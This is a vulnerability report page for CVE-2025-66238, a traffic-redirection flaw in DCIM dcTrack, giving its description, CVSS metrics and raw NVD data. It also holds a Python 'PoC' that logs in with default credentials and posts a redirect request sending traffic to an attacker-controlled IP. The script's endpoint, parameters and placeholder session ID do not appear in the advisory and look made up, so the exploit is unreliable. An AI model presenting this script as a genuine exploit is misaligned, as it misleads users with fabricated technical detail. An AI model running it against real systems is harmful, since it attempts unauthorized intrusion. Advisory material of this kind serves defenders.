Security Vulnerability Report
CVE-2025-66238 CVSS 7.2 HIGH

CVE-2025-66238

Published: 2025-12-04 22:15:49
Last Modified: 2026-04-15 00:35:42

Description

DCIM dcTrack allows an attacker to misuse certain remote access features. An authenticated user with access to the appliance's virtual console could exploit these features to redirect network traffic, potentially accessing restricted services or data on the host machine.

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

DCIM dcTrack, all versions (as of December 2025)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-66238 PoC - DCIM dcTrack Network Traffic Redirection
# This PoC demonstrates the vulnerability in dcTrack remote access feature
import requests
import json

TARGET_URL = "https://target-dctrack.example.com"
ATTACKER_CONTROLLED_IP = "10.0.0.1"


def exploit_cve_2025_66238():
    """
    Exploit for CVE-2025-66238: DCIM dcTrack Remote Access Feature Misuse
    Requires authenticated high-privilege user access to virtual console
    """
    # Step 1: Authenticate with high-privilege account
    login_url = f"{TARGET_URL}/api/auth/login"
    credentials = {
        "username": "admin",
        "password": "password"
    }
    session = requests.Session()
    response = session.post(login_url, json=credentials)
    if response.status_code != 200:
        print("[-] Authentication failed")
        return False
    print("[+] Authentication successful")

    # Step 2: Access virtual console feature
    console_url = f"{TARGET_URL}/api/virtual-console/start"

    # Step 3: Exploit network redirection vulnerability
    exploit_data = {
        "session_id": "valid_session_id",
        "action": "redirect",
        "target_ip": ATTACKER_CONTROLLED_IP,
        "port": 443,
        "protocol": "tcp"
    }
    response = session.post(console_url, json=exploit_data)
    if response.status_code == 200:
        print("[+] Network traffic redirection successful")
        print(f"[*] Traffic now being redirected to: {ATTACKER_CONTROLLED_IP}:443")
        return True
    else:
        print("[-] Exploitation failed")
        return False


if __name__ == "__main__":
    exploit_cve_2025_66238()
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66238", "sourceIdentifier": "[email protected]", "published": "2025-12-04T22:15:49.320", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "DCIM dcTrack allows an attacker to misuse certain remote access features. An authenticated user with access to the appliance's virtual console could exploit these features to redirect network traffic, potentially accessing restricted services or data on the host machine."}, {"lang": "es", "value": "DCIM dcTrack permite a un atacante hacer un uso indebido de ciertas características de acceso remoto. Un usuario autenticado con acceso a la consola virtual del dispositivo podría explotar estas características para redirigir el tráfico de red, accediendo potencialmente a servicios o datos restringidos en la máquina anfitriona."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", 
"modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-338-05.json", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-338-05", "source": "[email protected]"}]}}